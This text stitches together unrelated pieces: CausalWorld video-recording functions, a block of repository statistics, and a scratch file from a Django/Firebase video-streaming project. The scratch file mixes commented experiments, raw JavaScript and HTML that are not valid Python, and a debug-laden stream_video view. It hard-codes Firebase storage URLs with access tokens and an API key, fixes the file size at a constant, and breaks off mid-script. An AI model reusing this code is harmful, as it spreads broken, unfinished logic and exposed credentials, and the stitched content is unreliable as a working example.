                                  env_wrappers=(),
                                  env_wrappers_args=()):
    """
    Records a video of a random policy for a specified environment.

    :param task: (Task) the task of the environment
    :param world_params: (dict) the world_params of the environment; must
                         contain a "skip_frame" entry.
    :param file_name: (str) full path where the video is being stored;
                      the ".mp4" suffix is appended automatically.
    :param number_of_resets: (int) the number of resets/episodes to be viewed
    :param max_time_steps: (int) the maximum number of time steps per episode
    :param env_wrappers: (list) a list of gym wrappers
    :param env_wrappers_args: (list) a list of kwargs for the gym wrappers

    :return:
    """
    # get_world forces the environment's own skip_frame to 1, so frame
    # skipping is reproduced manually below; a fresh random action is
    # sampled at every simulated step.
    actual_skip_frame = world_params["skip_frame"]
    env = get_world(task.get_task_name(),
                    task.get_task_params(),
                    world_params,
                    enable_visualization=False,
                    env_wrappers=env_wrappers,
                    env_wrappers_args=env_wrappers_args)
    recorder = VideoRecorder(env, "{}.mp4".format(file_name))
    try:
        for _ in range(number_of_resets):
            obs = env.reset()
            recorder.capture_frame()
            for _ in range(max_time_steps):
                for _ in range(actual_skip_frame):
                    obs, reward, done, info = \
                        env.step(action=env.action_space.sample())
                    recorder.capture_frame()
    finally:
        # Finalize the video file and shut the simulator down even if the
        # environment raises mid-episode.
        recorder.close()
        env.close()
def record_video_of_episode(episode,
                            file_name,
                            env_wrappers=(),
                            env_wrappers_args=()):
    """
    Records a video of a logged episode for a specified environment.

    :param episode: (Episode) the logged episode to replay
    :param file_name: (str) full path where the video is being stored;
                      the ".mp4" suffix is appended automatically.
    :param env_wrappers: (list) a list of gym wrappers
    :param env_wrappers_args: (list) a list of kwargs for the gym wrappers

    :return:
    """
    # get_world forces the environment's own skip_frame to 1, so each
    # logged action is re-applied actual_skip_frame times.
    actual_skip_frame = episode.world_params["skip_frame"]
    env = get_world(episode.task_name,
                    episode.task_params,
                    episode.world_params,
                    enable_visualization=False,
                    env_wrappers=env_wrappers,
                    env_wrappers_args=env_wrappers_args)
    # check_bounds=False: the logged state is trusted as-is.
    env.set_starting_state(episode.initial_full_state, check_bounds=False)
    recorder = VideoRecorder(env, "{}.mp4".format(file_name))
    try:
        recorder.capture_frame()
        # Only the logged actions drive the replay; timestamps,
        # observations and rewards are zipped in solely to stay aligned
        # with the action sequence.
        for time, observation, reward, action in zip(episode.timestamps,
                                                     episode.observations,
                                                     episode.rewards,
                                                     episode.robot_actions):
            for _ in range(actual_skip_frame):
                env.step(action)
                recorder.capture_frame()
    finally:
        # Finalize the video file and shut the simulator down even if the
        # replay raises mid-episode.
        recorder.close()
        env.close()
def get_world(task_generator_id,
              task_params,
              world_params,
              enable_visualization=False,
              env_wrappers=(),
              env_wrappers_args=()):
    """
    Returns a particular CausalWorld instance with optional wrappers.

    :param task_generator_id: (str) id of the task of the environment
    :param task_params: (dict) task params of the environment; not modified
                        by this call.
    :param world_params: (dict) world_params of the environment; not
                         modified by this call.
    :param enable_visualization: (bool) if GUI visualization is enabled
    :param env_wrappers: (list) a list of gym wrappers
    :param env_wrappers_args: (list) a list of kwargs for the gym wrappers

    :return: (CausalWorld) a CausalWorld environment instance
    """
    # Work on copies: the previous implementation clobbered the caller's
    # world_params["skip_frame"] and deleted "task_name" from the caller's
    # task_params in place.
    world_params = dict(world_params)
    # Frame skipping is handled by the viewer/recorder callers themselves,
    # so the environment always runs with skip_frame == 1.
    world_params["skip_frame"] = 1
    # enable_visualization is passed explicitly below; drop any copy stored
    # inside world_params to avoid a duplicate keyword argument.
    world_params.pop("enable_visualization", None)
    if task_params is None:
        task = generate_task(task_generator_id)
    else:
        task_params = dict(task_params)
        # "task_name" is metadata, not a generate_task keyword argument.
        task_params.pop("task_name", None)
        task = generate_task(task_generator_id, **task_params)
    env = CausalWorld(task,
                      **world_params,
                      enable_visualization=enable_visualization)
    # Apply wrappers innermost-first; each wrapper is paired positionally
    # with its kwargs dict (an IndexError signals a length mismatch).
    for i in range(len(env_wrappers)):
        env = env_wrappers[i](env, **env_wrappers_args[i])
    return env
def record_video(env,
                 policy,
                 file_name,
                 number_of_resets=1,
                 max_time_steps=None):
    """
    Records a video of a policy acting in an already-constructed environment.

    :param env: (causal_world.CausalWorld) the environment to use for
                recording.
    :param policy: the policy to be evaluated; must expose reset() and
                   act(obs).
    :param file_name: (str) full path where the video is being stored;
                      the ".mp4" suffix is appended automatically.
    :param number_of_resets: (int) the number of resets/episodes to be viewed
    :param max_time_steps: (int) the maximum number of time steps per
                           episode; when None, each episode runs until the
                           environment reports done.

    :return:
    """
    recorder = VideoRecorder(env, "{}.mp4".format(file_name))
    for _ in range(number_of_resets):
        policy.reset()
        observation = env.reset()
        recorder.capture_frame()
        steps_taken = 0
        # Bounded mode runs exactly max_time_steps steps (ignoring done);
        # unbounded mode steps until the environment signals done.
        while max_time_steps is None or steps_taken < max_time_steps:
            observation, _, done, _ = env.step(action=policy.act(observation))
            recorder.capture_frame()
            steps_taken += 1
            if max_time_steps is None and done:
                break
    recorder.close()
    return
| 41.038314
| 77
| 0.595556
| 1,260
| 10,711
| 4.81746
| 0.103968
| 0.085173
| 0.056837
| 0.021746
| 0.825371
| 0.79374
| 0.741516
| 0.718451
| 0.718451
| 0.697199
| 0
| 0.00167
| 0.329008
| 10,711
| 260
| 78
| 41.196154
| 0.842911
| 0.285408
| 0
| 0.761905
| 1
| 0
| 0.019322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.02381
| 0
| 0.077381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
14ce02898896db8b4f4bbc54314217757b1b7349
| 62,245
|
py
|
Python
|
firebase_connection.py
|
samsoldeinstein/webster2020
|
9795635e806caa261bb33d629f3d1f2bd603638c
|
[
"MIT"
] | 6
|
2020-11-02T16:40:56.000Z
|
2020-11-07T06:59:00.000Z
|
firebase_connection.py
|
samsoldeinstein/webster2020
|
9795635e806caa261bb33d629f3d1f2bd603638c
|
[
"MIT"
] | null | null | null |
firebase_connection.py
|
samsoldeinstein/webster2020
|
9795635e806caa261bb33d629f3d1f2bd603638c
|
[
"MIT"
] | 2
|
2020-11-03T05:20:25.000Z
|
2020-11-03T05:38:47.000Z
|
# # import pyrebase
# # config = {
# # "apiKey": "AIzaSyDQKj9_KAG8-uMhWISn87AOHNS-fZuyBYg",
# # "authDomain": "strangeflix-85ae0.firebaseapp.com",
# # "databaseURL": "https://strangeflix-85ae0.firebaseio.com",
# # "projectId": "strangeflix-85ae0",
# # "storageBucket": "strangeflix-85ae0.appspot.com",
# # "messagingSenderId": "21362748883",
# # "appId": "1:21362748883:web:a585c9907c7362c7795326",
# # "measurementId": "G-61Z61Y7JWN"
# # }
# # firebase = pyrebase.initialize_app(config)
# # storage = firebase.storage()
# # import urllib.request
# # url_link = "https://www.youtube.com/watch?v=3D9g4erlOVE"
# # urllib.request.urlretrieve(url_link, 'video_name.mp4')
# # from pytube import YouTube
# # videourl = "https://www.youtube.com/watch?v=3D9g4erlOVE"
# # yt = YouTube(videourl)
# # yt = yt.streams.filter(progressive=True, file_extension='mp4').order_by('resolution').desc().first()
# # # if not os.path.exists(path):
# # # os.makedirs(path)
# # yt.download('/home/harshit/Desktop/webster2020/', filename='youtube_video')
# # import tldextract
# # ext = tldextract.extract('https://hr-testcases-us-east-1.s3.amazonaws.com/16007/input02.txt?AWSAccessKeyId=AKIAR6O7GJNX5DNFO3PV&Expires=1602080980&Signature=BuwFY6Z9vMkHbKgUkyp34ieOWpA%3D&response-content-type=text%2Fplain')
# # print(ext.domain)
# # import youtube_dl
# # import os
# # import ffmpeg
# # vid = ffmpeg.probe('/home/harshit/Desktop/webster2020/song.mp4')
# # print(vid)
# # GOOD CODE
# # import moviepy.editor as mp
# # duration = mp.VideoFileClip('/home/harshit/Desktop/webster2020/meta').duration
# # print(int(duration))
# # import filetype
# # kind = filetype.guess('/home/harshit/Desktop/webster2020/meta')
# # if kind is None:
# # print('Cannot guess file type!')
# # print('File extension: %s' % kind.extension)
# # print('File MIME type: %s' % kind.mime)
# # GOOD CODE
# # ydl_opts = {'outtmpl': '/home/harshit/Desktop/webster2020/m.txt', 'ignoreerrors': True}
# # with youtube_dl.YoutubeDL(ydl_opts) as ydl:
# # try:
# # dictMeta = ydl.extract_info("https://hr-testcases-us-east-1.s3.amazonaws.com/22937/input00.txt?AWSAccessKeyId=AKIAR6O7GJNX5DNFO3PV&Expires=1602314535&Signature=bn8GwIgarRB4j1ypmkV4CSa7If0%3D&response-content-type=text%2Fplain", download=True)
# # print(dictMeta)
# # # dictMeta['formats'][0]['ext'] - extension
# # except Exception as e:
# # print('File protected')
# # print(e)
# # with youtube_dl.YoutubeDL(ydl_opts) as ydl:
# # try:
# # obj = ydl.download(['https://www.hotstar.com/in/sports/cricket/indian-premier-league/mumbai-indians-vs-rajasthan-royals-m701670/match-clips/bumrahs-420-crushes-rrs-soul/1260043466'])
# # except Exception as e:
# # print(e)
# # with youtube_dl.YoutubeDL(ydl_opts) as ydl:
# # dictMeta = ydl.extract_info(
# # "https://www.youtube.com/watch?v=3D9g4erlOVA", download=True)
# # print(dictMeta)
# # for unavailable video or protected video dictmeta = None
# # duration = dictMeta['duration']
# # ydl_opts = {
# # 'format': 'bestaudio/best',
# # 'outtmpl': 'tmp/%(id)s.%(ext)s',
# # 'noplaylist': True,
# # 'quiet': True,
# # 'prefer_ffmpeg': True,
# # 'logger': MyLogger(),
# # 'audioformat': 'wav',
# # 'forceduration':True
# # }
# # sID = "t99ULJjCsaM"
# # with youtube_dl.YoutubeDL(ydl_opts) as ydl:
# # dictMeta = ydl.extract_info(
# # "https://www.youtube.com/watch?v={sID}".format(sID=sID),
# # download=True)
# # import requests
# # file_url = "https://hr-testcases-us-east-1.s3.amazonaws.com/22937/input00.txt?AWSAccessKeyId=AKIAR6O7GJNX5DNFO3PV&Expires=1602314535&Signature=bn8GwIgarRB4j1ypmkV4CSa7If0%3D&response-content-type=text%2Fplain"
# # r = requests.get(file_url, stream = True)
# # with open("aws.txt","wb") as f:
# # for chunk in r.iter_content(chunk_size=1024):
# # # writing one chunk at a time to pdf file
# # if chunk:
# # f.write(chunk)
# # path_on_cloud = "videos/youtube.mp4"
# # path_local = "youtube.mp4"
# # obj = storage.child(path_on_cloud).put(path_local)
# # print(obj)
# # storage.child(path_on_cloud).download(path_local)
# # c66211e8-13bc-42cd-9db9-08349ba7dc1c --- webster.pdf
# # f29df98c-1d8d-47f1-b329-f8816d6b295c --- song.mp4
# # 7043cb4a-87ab-449d-bb99-4cdc19e59cb7 --- testcase
# # url = storage.child(path_on_cloud).get_url('')
# # print(url)
# import re
# import os
# from wsgiref.util import FileWrapper
# from django.http import StreamingHttpResponse
# import mimetypes
# def file_iterator(file_name, chunk_size=8192, offset=0, length=None):
# with open(file_name, "rb") as f:
# f.seek(offset, os.SEEK_SET)
# remaining = length
# while True:
# bytes_length = chunk_size if remaining is None else min(remaining, chunk_size)
# data = f.read(bytes_length)
# if not data:
# break
# if remaining:
# remaining -= len(data)
# yield data
# from django.views.decorators.http import condition
# # @condition(etag_func=None)
# def stream_video(path):
# path = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F1ae247bf-5049-409b-8e58-2453ebcb583e.mp4?alt=media&token=d345d5ca-7c94-4c0b-a3b1-6ea77b968164'
# """ responds to the video file as """
# range_header = request.META.get('HTTP_RANGE', '').strip()
# range_header = 'bytes=0-50'
# range_re = re.compile(r'bytes\s*=\s*(\d+)\s*-\s*(\d*)', re.I)
# range_match = range_re.match(range_header)
# print(range_match)
# # size = os.path.getsize(path)
# content_type, encoding = mimetypes.guess_type(path)
# content_type = content_type or 'application/octet-stream'
# if range_match:
# first_byte, last_byte = range_match.groups()
# first_byte = int(first_byte) if first_byte else 0
# last_byte = first_byte + 1024 * 1024 * 8 # 8M per piece, the maximum volume of the response body
# # if last_byte >= size:
# # last_byte = size - 1
# # print(type(first_byte))
# # print(type(last_byte))
# length = last_byte - first_byte + 1
# resp = StreamingHttpResponse(file_iterator(path, offset=first_byte, length=length), status=206, content_type=content_type)
# resp['Content-Length'] = str(length)
# resp['Content-Range'] = 'bytes %s-%s/%s' % (first_byte, last_byte, 0)
# else:
# # When the video stream is not obtained, the entire file is returned in the generator mode to save memory.
# resp = StreamingHttpResponse(FileWrapper(open(path, 'rb')), content_type=content_type)
# resp['Content-Length'] = str(size)
# resp['Accept-Ranges'] = 'bytes'
# print(resp)
# # for obj in resp:
# # print(obj)
# # return resp
# # stream_video('https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F1ae247bf-5049-409b-8e58-2453ebcb583e.mp4?alt=media&token=d345d5ca-7c94-4c0b-a3b1-6ea77b968164')
# var formData = new FormData();
# $.ajax({
# type: 'POST',
# url: '{% url "stream_video" %}',
# data: formData,
# dataType: 'json',
# enctype: 'multipart/form-data',
# processData: false,
# contentType: false,
# success: function (data) {
# // console.log(data.resp);
# var byteCharacters = atob(data.resp);
# var byteNumbers = new Array(byteCharacters.length);
# for (let i = 0; i < byteCharacters.length; i++) {
# byteNumbers[i] = byteCharacters.charCodeAt(i);
# }
# var video = document.querySelector('video');
# // Show loading animation.
# var playPromise = video.play();
# if (playPromise !== undefined) {
# playPromise.then(_ => {
# // Automatic playback started!
# // Show playing UI.
# })
# .catch(error => {
# // Auto-play was prevented
# // Show paused UI.
# });
# }
# var blobArray = [];
# blobArray.push(new Blob([new Uint8Array(byteNumbers)],{'type':'video/mp4'}));
# var currentTime = video.currentTime;
# var blob = new Blob(blobArray,{'type':'video/mp4'});
# video.src = window.URL.createObjectURL(blob);
# video.currentTime = currentTime;
# $('.progress__filled').css('flex', '0');
# $('#video-in-modal').modal('show');
# video.play();
# }
# });
# # import re
# # import os
# # from wsgiref.util import FileWrapper
# # from django.http import StreamingHttpResponse
# # import mimetypes
# # def file_iterator(file_name, chunk_size=8192, offset=0, length=None):
# # with open(file_name, "rb") as f:
# # f.seek(offset, os.SEEK_SET)
# # remaining = length
# # while True:
# # bytes_length = chunk_size if remaining is None else min(remaining, chunk_size)
# # data = f.read(bytes_length)
# # if not data:
# # break
# # if remaining:
# # remaining -= len(data)
# # yield data
# from django.views.decorators.http import condition
# import base64
# from moviepy.video.io.ffmpeg_tools import ffmpeg_extract_subclip
# @csrf_exempt
# # @condition(etag_func=None)
# def stream_video(request):
# # path = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F1ae247bf-5049-409b-8e58-2453ebcb583e.mp4?alt=media&token=d345d5ca-7c94-4c0b-a3b1-6ea77b968164'
# path = '/home/harshit/Desktop/webster2020/out1.mp4'
# """ responds to the video file as """
# # range_header = request.META.get('HTTP_RANGE', '').strip()
# # range_header = 'bytes=0-50'
# # range_re = re.compile(r'bytes\s*=\s*(\d+)\s*-\s*(\d*)', re.I)
# # range_match = range_re.match(range_header)
# # # print(range_match)
# # size = os.path.getsize(path)
# # content_type, encoding = mimetypes.guess_type(path)
# # content_type = content_type or 'application/octet-stream'
# # if range_match:
# # first_byte, last_byte = range_match.groups()
# # first_byte = int(first_byte) if first_byte else 0
# # last_byte = first_byte + 1024 # 8M per piece, the maximum volume of the response body
# # if last_byte >= size:
# # last_byte = size - 1
# # # print(type(first_byte))
# # # print(type(last_byte))
# # length = last_byte - first_byte + 1
# # resp = StreamingHttpResponse(file_iterator(path, offset=first_byte, length=length), status=206, content_type=content_type)
# # resp['Content-Length'] = str(length)
# # resp['Content-Range'] = 'bytes %s-%s/%s' % (first_byte, last_byte, size)
# # else:
# # # When the video stream is not obtained, the entire file is returned in the generator mode to save memory.
# # resp = StreamingHttpResponse(FileWrapper(open(path, 'rb')), content_type=content_type)
# # resp['Content-Length'] = str(size)
# # resp['Accept-Ranges'] = 'bytes'
# # # print(resp)
# # for key, val in resp.items():
# # print(key)
# # print(val)
# # e = ''
# # for e in resp:
# # print(e.decode())
# # print(resp.streaming_content)
# start_time = 60
# end_time = 80
# ffmpeg_extract_subclip("/home/harshit/Desktop/webster2020/song.mp4", start_time, end_time, targetname="/home/harshit/Desktop/webster2020/out1.mp4")
# with open(path, "rb") as videoFile:
# text = base64.b64encode(videoFile.read()).decode('utf-8')
# # print(text)
# context = {
# 'resp': text
# }
# return JsonResponse(context)
# var formData = new FormData();
# $.ajax({
# type: 'POST',
# url: '{% url "stream_video" %}',
# data: formData,
# dataType: 'json',
# enctype: 'multipart/form-data',
# processData: false,
# contentType: false,
# success: function (data) {
# // console.log(data.resp);
# var byteCharacters = atob(data.resp);
# var byteNumbers = new Array(byteCharacters.length);
# for (let i = 0; i < byteCharacters.length; i++) {
# byteNumbers[i] = byteCharacters.charCodeAt(i);
# }
# var video = document.querySelector('video');
# // Show loading animation.
# var playPromise = video.play();
# if (playPromise !== undefined) {
# playPromise.then(_ => {
# // Automatic playback started!
# // Show playing UI.
# })
# .catch(error => {
# // Auto-play was prevented
# // Show paused UI.
# });
# }
# var blobArray = [];
# blobArray.push(new Blob([new Uint8Array(byteNumbers)],{'type':'video/mp4'}));
# var currentTime = video.currentTime;
# var blob = new Blob(blobArray,{'type':'video/mp4'});
# video.src = window.URL.createObjectURL(blob);
# video.currentTime = currentTime;
# $('.progress__filled').css('flex', '0');
# $('#video-in-modal').modal('show');
# video.play();
# }
# });
# var formData = new FormData();
# $.ajax({
# type: 'POST',
# url: '{% url "stream_video" %}',
# data: formData,
# dataType: 'json',
# enctype: 'multipart/form-data',
# processData: false,
# contentType: false,
# success: function (data) {
# console.log(data.resp);
# var byteCharacters = atob(data.resp);
# var byteNumbers = new Array(byteCharacters.length);
# for (let i = 0; i < byteCharacters.length; i++) {
# byteNumbers[i] = byteCharacters.charCodeAt(i);
# }
# var video = document.querySelector('movie_video_player');
# // Show loading animation.
# var playPromise = video.play();
# if (playPromise !== undefined) {
# playPromise.then(_ => {
# // Automatic playback started!
# // Show playing UI.
# })
# .catch(error => {
# // Auto-play was prevented
# // Show paused UI.
# });
# }
# var blobArray = [];
# blobArray.push(new Blob([new Uint8Array(byteNumbers)],{'type':'video/mp4'}));
# var currentTime = video.currentTime;
# var blob = new Blob(blobArray,{'type':'video/mp4'});
# video.src = window.URL.createObjectURL(blob);
# video.currentTime = currentTime;
# $('.progress__filled').css('flex', '0');
# // $('#video-in-modal').modal('show');
# video.play();
# }
# });
# import base64
# from moviepy.video.io.ffmpeg_tools import ffmpeg_extract_subclip
# # @csrf_exempt
# # def stream_video(request):
# # # path = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F1ae247bf-5049-409b-8e58-2453ebcb583e.mp4?alt=media&token=d345d5ca-7c94-4c0b-a3b1-6ea77b968164'
# # path = '/home/harshit/Desktop/webster2020/out2.mp4'
# # start_time = 250
# # end_time = 270
# # ffmpeg_extract_subclip("https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2Fab783e7c-1bfb-4992-89e3-fa1fcd708936.mp4?alt=media&token=69b4c009-4bf3-4ef7-ad68-faafc91fcd4c", start_time, end_time, targetname="/home/harshit/Desktop/webster2020/out2.mp4")
# # with open(path, "rb") as videoFile:
# # text = base64.b64encode(videoFile.read()).decode('utf-8')
# # # print(text)
# # context = {
# # 'resp': text
# # }
# # return JsonResponse(context)
# playerhtml = <div class="player" id="video-player"><!-- video-head --><div class="video-head"></div><!-- video-body --><div class="video-body"><video class="player__video viewer" id="movie_video_player" preload="metadata"><source id="insert-movie-video" src="" type="video/mp4"></video></div><!-- video-footer --><div class="video-footer"><div class="player__controls" id="plact"><!-- progress-bar --><div class="progress"><div class="progress__filled"></div></div><!-- play/pause --><button class="player__button toggle" data-toggle="tooltip" title="pause"><i id="play-icon"class="fas fa-play"></i></button> <!-- skip 10s backword --><button data-skip="-10" class="backword__button" data-toggle="tooltip" title="Skip -10s">« 10s</button><!-- skip 10s forward --><button data-skip="10" class="forward__button" data-toggle="tooltip" title="Skip 10s">10s »</button><!-- volume --><button class="volume__button" data-toggle="tooltip" title="mute" id="volume"><i id="vol-ico" class="fas fa-volume-up"></i></button><input type="range" name="volume" id="vol-ran" class="player__slider" min="0" max="1" step="0.05" value="1"><!-- video timer --><button id="progressTime" class="timer__button"><span id="current">00:00 / </span><span id="duration">00:00</span></button><!-- playbackrate --><!-- <input type="range" name="playbackRate" class="player__slider" min="0.5" max="2" step="0.1" value="1"> --><div class="fullscreen"><!-- setting --><!-- <button id="setting" class="setting__button" data-toggle="tooltip" title="setting"><span class="px-4"><i id="setting-ico" class="fas fa-cog"></i></span></button> --><div class="btn-group dropup"><button id="setting" class="setting__button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><span class="px-4"><i id="setting-ico" class="fas fa-cog"></i></span></button><div class="dropdown-menu"><a href="#" class="dropdown-item playbacki dis">Playback speed</a><a href="#" class="dropdown-item quali dis">Video Quality</a><a href="#" 
class="dropdown-item shortcuts dis">Keyboard shortcuts</a><a href="#" class="dropdown-item playback">0.25</a><a href="#" class="dropdown-item playback">0.5</a><a href="#" class="dropdown-item playback">1</a><a href="#" class="dropdown-item playback">1.25</a><a href="#" class="dropdown-item playback">1.5</a><a href="#" class="dropdown-item playback">1.75</a><a href="#" class="dropdown-item playback">2</a><a href="#" class="dropdown-item qual">Auto</a><a href="#" class="dropdown-item qual">480p</a><a href="#" class="dropdown-item qual">720p</a><a href="#" class="dropdown-item qual">1080p</a></div></div><!-- picture-in-picture --><button id="pip" class="pip__button" data-toggle="tooltip" title="picture-in-picture"><span class="px-4"><i id="pip-ico" class="fas fa-window-maximize"></i></span></button><!-- theatre view --><button class="theatre__button" data-toggle="tooltip" title="theatre mode"><span class="px-4"><i id="th-ico" class="fas fa-mobile-alt"></i></span></button><!-- fullscreen --><button id="fs" class="fs__button" data-toggle="tooltip" title="fullscreen(f)"><span class="px-4"><i id="fs-ico" class="fas fa-expand"></i></span></button></div></div></div></div>
import requests
# Scratch snippet: stream-download a firebase-hosted mp4 to a local file.
# NOTE(review): the URL embeds a storage access token — presumably
# temporary test data; confirm it is not a live credential.
# resume_header = {'Range':'bytes=100-300000'}
url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F0b3aaf33-f04d-4949-aafc-f147571b2a6e.mp4?alt=media&token=0c45781c-001f-48f4-a7cd-ed0f569f5c1d'
# r = requests.get(url, stream=True, headers=resume_header)
# with open('filename.mp4','wb') as f:
#     for chunk in r.iter_content(chunk_size=1024):
#         f.write(chunk)
# stream=True defers the body download so it can be consumed in chunks
# below instead of being held in memory at once.
r = requests.get(url, stream=True)
# r.raise_for_status()
# Hard-coded destination path — machine-specific scratch location.
with open("/home/harshit/Desktop/webster2020/check.mp4", 'wb') as f:
    for chunk in r.iter_content(chunk_size=8192):
        if chunk: # filter out keep-alive new chunks
            f.write(chunk)
@condition(etag_func=None)
def stream_video(request, video_obj):
    """Serve a stored video over HTTP, honoring Range requests.

    Looks up the video record matching *video_obj*, then either streams a
    byte range (HTTP 206) or downloads and returns the whole file.

    NOTE(review): experimental/debug state — the firebase URL and ``size``
    are hard-coded, the computed ``path_on_cloud`` is unused, and several
    debug ``print`` calls remain; confirm before production use.

    :param request: (HttpRequest) incoming request; HTTP_RANGE is read
                    from request.META.
    :param video_obj: video record whose ``video_type`` selects which
                      model table to query (1 = free, 2 = series,
                      3 = movie).
    :return: (StreamingHttpResponse) partial (206) or full video content.
    """
    print(request.META)
    # Resolve the concrete video row from the table implied by video_type.
    # NOTE(review): no branch matches other video_type values, leaving
    # video_details unbound — presumably video_type is always 1..3.
    if video_obj.video_type == 1:
        video_details = FreeSeriesVideos.objects.filter(video_id=video_obj).first()
        if video_details is None:
            video_details = FreeMovieVideo.objects.filter(video_id=video_obj).first()
    elif video_obj.video_type == 2:
        video_details = SeriesVideos.objects.filter(video_id=video_obj).first()
    elif video_obj.video_type == 3:
        video_details = MovieVideo.objects.filter(video_id=video_obj).first()
    # getting firebase url for uploaded video file
    # NOTE(review): path_on_cloud is computed but never used below — the
    # URL is currently hard-coded for testing.
    path_on_cloud = 'videos/' + video_details.firebase_save_name + '.' + VIDEO_EXTENSION_REVERSE[video_details.extension]
    # firebase_video_url = storage.child(path_on_cloud).get_url(video_details.firebase_token)
    # firebase_video_url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2Fab783e7c-1bfb-4992-89e3-fa1fcd708936.mp4?alt=media&token=69b4c009-4bf3-4ef7-ad68-faafc91fcd4c'
    firebase_video_url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F0b3aaf33-f04d-4949-aafc-f147571b2a6e.mp4?alt=media&token=0c45781c-001f-48f4-a7cd-ed0f569f5c1d'
    # firebase_video_url = 'https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F05628f4f-11b2-4bb0-bc93-76bb13fa3221.mp4?alt=media&token=47726f97-1404-40bf-bdf9-75b389c8f836'
    # firebase_video_url = '/home/harshit/Desktop/webster2020/song.mp4'
    """ responds to the video file as """
    # base_url = "https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2F05628f4f-11b2-4bb0-bc93-76bb13fa3221.mp4"
    # import requests
    # res = requests.get(base_url).body()
    # print(res)
    print('video')
    # req = urllib.request.Request(firebase_video_url, headers=request.META)
    # rr = 'bytes=' + str(first_byte) + '-' + str(first_byte + 503500)
    # # req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36')
    # req.add_header('Range', rr) # <=== range header
    # res = urllib.request.urlopen(req)
    # import requests
    # r = requests.get(firebase_video_url, request.META)
    # print(r.headers)
    # print(r.status_code)
    # a = res.read()
    # return a
    # path = '/home/harshit/Desktop/webster2020/sample_video.mp4'
    # Parse the client's Range header, e.g. "bytes=0-1023".
    range_header = request.META.get('HTTP_RANGE', '').strip()
    range_re = re.compile(r'bytes\s*=\s*(\d+)\s*-\s*(\d*)', re.I)
    range_match = range_re.match(range_header)
    # NOTE(review): hard-coded total size of the test video in bytes —
    # must be derived from the actual file before production use.
    size = 574823
    # size = 3151886
    # size = 16508537
    if range_match:
        # Range request: respond with HTTP 206 Partial Content.
        print("range perfect")
        first_byte, last_byte = range_match.groups()
        first_byte = int(first_byte) if first_byte else 0
        # An open-ended range ("bytes=N-") runs to the end of the file.
        last_byte = int(last_byte) if last_byte else size - 1
        if last_byte >= size:
            last_byte = size - 1
        length = last_byte - first_byte + 1
        # req = urllib.request.Request(firebase_video_url)
        # rr = 'bytes=' + str(first_byte) + '-' + str(first_byte + 503500)
        # req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36')
        # req.add_header('Range', rr) # <=== range header
        # res = urllib.request.urlopen(req)
        # extension = str(firebase_video_url).split('?')[0][-3:]
        # unique_video_name = str(uuid.uuid4())
        # print(unique_video_name)
        # video_fragment_save_path = VIDEO_BASE_FILEPATH + '/' + unique_video_name + '.' + extension
        # with open(video_fragment_save_path, 'wb') as f:
        #     f.write(res.read())
        # content_type, encoding = mimetypes.guess_type(path)
        # content_type = content_type or 'application/octet-stream'
        content_type = 'video/mp4'
        # print(content_type)
        # print(encoding)
        # response_iter is defined elsewhere in the project — presumably it
        # yields chunks of the remote file; TODO confirm it honors the
        # requested byte range.
        resp = StreamingHttpResponse(response_iter(firebase_video_url, request), status=206, content_type=content_type)
        # resp = StreamingHttpResponse(file_iterator(path, offset=first_byte, length=length), status=206, content_type=content_type)
        print('ggod')
        resp['Content-Length'] = str(length)
        resp['Content-Range'] = 'bytes %s-%s/%s' % (first_byte, last_byte, size)
        print('response sent')
        # return redirect(firebase_video_url)
        # os.remove(video_fragment_save_path)
    else:
        # No Range header: download the whole file to a temp path and
        # stream it back from disk.
        print("range not fine")
        extension = str(firebase_video_url).split('?')[0][-3:]
        unique_video_name = str(uuid.uuid4())
        # NOTE(review): extension is computed above but the saved name is
        # hard-coded to '.flv' — looks unintentional; confirm.
        video_fragment_save_path = VIDEO_BASE_FILEPATH + '/' + unique_video_name + '.' + 'flv'
        req = urllib.request.Request(firebase_video_url)
        req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0')
        # req.add_header('Range', range_header) # <=== range header
        res = urllib.request.urlopen(req)
        with open(video_fragment_save_path, 'wb') as f:
            f.write(res.read())
        content_type, encoding = mimetypes.guess_type(video_fragment_save_path)
        content_type = content_type or 'application/octet-stream'
        # When the video stream is not obtained, the entire file is returned in the generator mode to save memory.
        resp = StreamingHttpResponse(FileWrapper(open(video_fragment_save_path, 'rb')), content_type=content_type)
        resp['Content-Length'] = str(size)
        # os.remove(video_fragment_save_path)
        resp['accept-ranges'] = 'bytes'
    print('go')
    return resp
// // function to keep fetching next packet for movie video
// window.setInterval(function(){
// // call your function here
// var video = document.getElementById('movie-video');
// if (video != null && !video.paused) {
// if ((movie_maxtime_fetched - movie_previous_time_watched - Math.ceil(video.currentTime)) == 9) {
// console.log('fetching');
// var movie_id = document.getElementById('selected_movie_id').innerHTML;
// var data = {
// 'movie_id': movie_id,
// 'start_time': movie_maxtime_fetched,
// }
// // adding data to javascript form which is to be send over ajax request
// var formData = new FormData();
// formData.append('data', JSON.stringify(data));
// $.ajax({
